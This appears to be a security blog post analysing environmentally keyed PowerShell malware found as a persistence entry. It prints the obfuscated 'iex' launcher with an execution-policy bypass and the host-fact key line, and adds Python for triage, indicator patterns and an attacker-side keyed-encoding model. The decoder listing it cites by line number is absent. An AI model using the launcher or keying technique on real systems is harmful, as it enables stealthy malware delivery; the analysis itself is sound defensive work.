ThreatOps Analysis: Keyed Malware


Malware authors are always coming up with clever ways to avoid detection. For malware written with managed code—for example, PowerShell or .NET malware—the authors will encode it to make it even harder to identify its malicious intent.

Taking that a step further, attackers will sometimes "key" the malware to a particular host or user. The payload can then only be decoded and run on the targeted machine, because the decoding key is derived from host-specific values such as the hostname, IP address, or the logged-in user.

Let's dig into an example.

In this blog, we’re looking at a PowerShell command with an environmentally keyed payload. In other words, the payload will (normally) only execute on the particular host for which it was keyed, making automated analysis much more difficult.

The Find

We identified a host with multiple malicious footholds. One such foothold was a persistence entry with the following command:

"display_name": "CxPeyAYSmEobMGPQ","name": "LjyLgJoB","command": "%COMSPEC% /C start %COMSPEC% /C powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -C \"iex ('''789cbd588f73d3c8154ec811c092'''+([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('fCV7JGRzemF5PSRffQpbQnl0ZVtdXSRrcW1vZj1AKCk7KDAuLigkZHN6YXkuTGVuZ3RoLzItMSkpfCV7JGtxbW9mKz1bY2hhcl1')))); exit\"\n",

The command uses the %COMSPEC% environment variable, which by default points to cmd.exe. It first starts an instance of cmd.exe, which uses start to launch a second cmd.exe, which ultimately runs powershell.exe with a command supplied through the -C option (the shortened form of -Command). The other switches are abbreviated the same way: -NoE for -NoExit, -NoP for -NoProfile, -NonI for -NonInteractive, and -ExecutionPolicy Bypass to sidestep script execution restrictions.

The PowerShell command itself consists of a long hexadecimal string concatenated with the result of [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(...)), where the argument is a base64 string, and the combined string is handed to iex (Invoke-Expression). Decoding the base64 string reveals what appears to be a decoder into which the hexadecimal string (789cbd588f73…) is piped:
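To do the same triage without executing anything, here is an added Python script (not tooling from the original post). It takes the command line quoted above, pulls out the base64-encoded decoder and the hex blob, decodes the base64 even though the quoted copy is cut short (no padding), checks whether the hex begins with a zlib header, and flags the launcher traits worth hunting for. The regular expressions, indicator names and function names are this example's own.

```python
"""Triage of a keyed PowerShell launcher: separate its stages without running them.

Added example, not tooling from the original post.
"""
import base64
import re

# The command line quoted in the post, with the JSON escaping removed.
SAMPLE_COMMAND = r"""
%COMSPEC% /C start %COMSPEC% /C powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -C "iex ('''789cbd588f73d3c8154ec811c092'''+([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('fCV7JGRzemF5PSRffQpbQnl0ZVtdXSRrcW1vZj1AKCk7KDAuLigkZHN6YXkuTGVuZ3RoLzItMSkpfCV7JGtxbW9mKz1bY2hhcl1')))); exit"
""".strip()

# Patterns for the two stages the post describes (the decoder wrapped in base64,
# and the hex blob it is applied to). Written for this example's launcher shape.
B64_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")
HEX_RE = re.compile(r"'''([0-9a-fA-F]+)'''")

# Launcher traits worth a hunting query; names and patterns are this example's own.
LAUNCHER_INDICATORS = {
    "nested cmd.exe via start": re.compile(r"%COMSPEC%\s+/C\s+start\s+%COMSPEC%", re.I),
    "execution policy bypass": re.compile(r"-ExecutionPolicy\s+Bypass", re.I),
    "abbreviated switches": re.compile(r"-NoP\b|-NonI\b|-NoE\b", re.I),
    "invoke-expression of a string": re.compile(r"\biex\s*\(", re.I),
    "inline base64 decode": re.compile(r"FromBase64String\(", re.I),
}


def decode_b64_lenient(s: str) -> bytes:
    """Decode base64 that may have been cut short, as quoted samples often are."""
    return base64.b64decode(s + "=" * (-len(s) % 4))


def extract_stages(command: str) -> dict:
    """Return the hex blob and the decoded decoder text from a launcher command line."""
    b64 = B64_RE.search(command)
    hexblob = HEX_RE.search(command)
    if not (b64 and hexblob):
        raise ValueError("launcher shape not recognised")
    return {
        "hex": hexblob.group(1),
        "decoder": decode_b64_lenient(b64.group(1)).decode("utf-8"),
    }


def looks_like_zlib(hexblob: str) -> bool:
    """True if the bytes start with a zlib header (CM=8, window 32K, CMF*256+FLG % 31 == 0)."""
    raw = bytes.fromhex(hexblob)
    if len(raw) < 2:
        return False
    cmf, flg = raw[0], raw[1]
    return (cmf & 0x0F) == 8 and (cmf >> 4) <= 7 and (cmf * 256 + flg) % 31 == 0


def launcher_indicators(command: str) -> list:
    """Names of the launcher traits present in the command line."""
    return [name for name, rx in LAUNCHER_INDICATORS.items() if rx.search(command)]


if __name__ == "__main__":
    stages = extract_stages(SAMPLE_COMMAND)
    print("hex blob:", stages["hex"])
    print("zlib header:", looks_like_zlib(stages["hex"]))
    print("decoder:\n" + stages["decoder"])
    print("indicators:", launcher_indicators(SAMPLE_COMMAND))
```

The decoder text begins with `|%{`, which confirms the hex string is piped into it rather than merely placed next to it; the `789c` prefix is the zlib header for deflate at default compression, so the blob was compressed before being hex-encoded.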

The 'Bad key' on the last line of the decoder stands out; there is a case in which the decoder can fail. Looking closer, we can see that COMPUTERNAME, USERNAME, USERDOMAIN, and the host's IP address(es) (lines 11–13) are combined into a key, $kl, which is required to decode the payload (the hexadecimal string from the command):

$kl='';($env:COMPUTERNAME,$env:USERNAME,$env:USERDOMAIN)+@((Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter 'ipenabled=''true''').IPAddress)|%{$kl+=$_}

Malware authors and attackers like to use PowerShell because it is ubiquitous. In addition, the nature of PowerShell code makes it harder to identify as malicious, especially if the command is encoded. To inspect it, you either have to decode it or observe it while running. In this case, the payload was keyed to the host, so you can’t just run it anywhere.

We were able to hard-code the key using the details we knew about the host (line 2) and print the decoded payload (line 17) rather than executing it.

The payload is used to download and execute Meterpreter directly from memory.
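To make the keying and the analyst's hard-coded-key trick concrete, here is an added Python model of an environmentally keyed payload. It is not the sample's decoder, whose cipher is not reproduced in the post; the scheme below (a keystream derived from the key, XORed over the script, with an HMAC tag checked before anything would run) is an assumed one chosen to reproduce the observable behaviour: a key built by concatenating COMPUTERNAME, USERNAME, USERDOMAIN and the IP addresses in that order, a zlib outer layer that gives the 789c prefix, and a 'Bad key' failure on any other host. The host facts and the stage-two script are constructed placeholders, and the function names are this example's own.

```python
"""Model of an environmentally keyed PowerShell payload, for analysis practice.

Added example; this is NOT the decoder from the sample. The cipher is an
assumed scheme that reproduces the behaviour described in the post.
"""
import hashlib
import hmac
import itertools
import zlib
from typing import Iterable, List, Optional, Tuple

# Constructed victim facts standing in for the real ones, which the post does not give.
VICTIM = dict(computername="WS-FINANCE-07", username="jdoe",
              userdomain="CORP", ip_addresses=["10.0.12.45"])
# Constructed, harmless stand-in for the stage-two script.
STAGE2 = "Write-Host 'stage two would run here'"


def build_key(computername: str, username: str, userdomain: str,
              ip_addresses: List[str]) -> str:
    """Mirror $kl: the host facts concatenated in this order with no separator."""
    return "".join([computername, username, userdomain, *ip_addresses])


def _xor_stream(data: bytes, key: str) -> bytes:
    # Assumed key schedule: SHA-256 of the key string, repeated over the data.
    k = hashlib.sha256(key.encode()).digest()
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(data))


def key_payload(script: str, key: str) -> str:
    """Attacker side: tag the script under the key, XOR it, compress, hex-encode."""
    body = script.encode()
    tag = hmac.new(key.encode(), body, "sha256").digest()[:8]
    return zlib.compress(_xor_stream(tag + body, key)).hex()


def decode_payload(hex_blob: str, key: str) -> str:
    """Victim side: undo the layers; raise 'Bad key' when the tag does not verify."""
    plain = _xor_stream(zlib.decompress(bytes.fromhex(hex_blob)), key)
    tag, body = plain[:8], plain[8:]
    expected = hmac.new(key.encode(), body, "sha256").digest()[:8]
    if not hmac.compare_digest(tag, expected):
        raise ValueError("Bad key")
    return body.decode()


def recover_script(hex_blob: str, computernames: Iterable[str], usernames: Iterable[str],
                   userdomains: Iterable[str], ip_sets: Iterable[Tuple[str, ...]]
                   ) -> Optional[Tuple[str, str]]:
    """Analyst side: hard-code candidate host facts instead of running the sample.

    Tries every combination (useful when one fact, e.g. the IP, is only known
    to within a few candidates) and returns (key, decoded script) on success.
    """
    for cn, un, dom, ips in itertools.product(computernames, usernames, userdomains, ip_sets):
        key = build_key(cn, un, dom, list(ips))
        try:
            return key, decode_payload(hex_blob, key)
        except ValueError:
            continue
    return None


# The keyed blob an analyst would lift from the launcher (constructed here).
KEYED = key_payload(STAGE2, build_key(**VICTIM))


if __name__ == "__main__":
    print("blob starts with:", KEYED[:4])
    try:
        decode_payload(KEYED, build_key("OTHER-PC", "jdoe", "CORP", ["10.0.12.45"]))
    except ValueError as err:
        print("wrong host:", err)
    found = recover_script(KEYED, ["WS-FINANCE-01", "WS-FINANCE-07"], ["jdoe"], ["CORP"],
                           [("10.0.12.44",), ("10.0.12.45",)])
    print("recovered:", found[1] if found else None)
```

The point of the model is the last function: once the host facts are known (or can be enumerated from a few candidates), the analyst rebuilds $kl and prints the decoded script instead of handing it to iex, which is exactly the substitution made above.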

Interestingly, the payload includes several error messages that you would not expect to find in malware. For example, “something blocking access to the ‘Connect’ method, probably Firewall or AV software.” With the use of meterpreter and the expressive error messages, we initially thought this was from a penetration test, but the customer said they had not engaged a pen-testing company. 🤨

• • •

We hope you enjoyed this glimpse into the types of shady tactics that cross our threat analysts' desks. If anything, it shows the lengths attackers will go to maximize their payload and minimize their chance of being detected.
